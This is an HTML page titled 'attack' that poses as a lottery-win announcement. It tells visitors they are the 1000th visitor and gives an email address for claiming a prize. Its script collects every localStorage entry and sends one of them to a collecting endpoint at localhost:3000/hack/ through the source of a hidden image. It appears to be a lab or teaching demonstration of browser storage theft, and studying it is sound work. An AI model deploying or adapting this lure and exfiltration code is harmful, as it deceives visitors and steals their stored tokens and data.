<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <title>attack</title>
  <style>
    div {
      text-align: center;
      margin: 90px 10px;
      margin-left: 30%;
      width: 36%;
      border: 1px solid #ccc;
      border-radius: 10px;
    }
  </style>
</head>

<body>
  <div>
    <h1 style="background-color: blue;color:aqua">Congratulations!! You win the lottery !!!!!</h1>
    <h2 style="text-shadow: 0px 0px 4px red;   ">You are the 1000
      <sup>th</sup> visitor</h2>
    <br>
    <br>
    <p style="color:gray">Please mailTo: luckydraw@yahoo.com to collect your gift</p>
  </div>
  <img id="image" alt="" hidden>
  <script>
    var arr = [];
    if (localStorage.length) {
      for (i in localStorage) {
        arr.push(i + ":" + localStorage.getItem(i));
      }
    }
    console.log(arr[0]);
    document.getElementById("image").src = "http://localhost:3000/hack/" + JSON.stringify(arr[1]) ; 
  </script>

</body>

</html>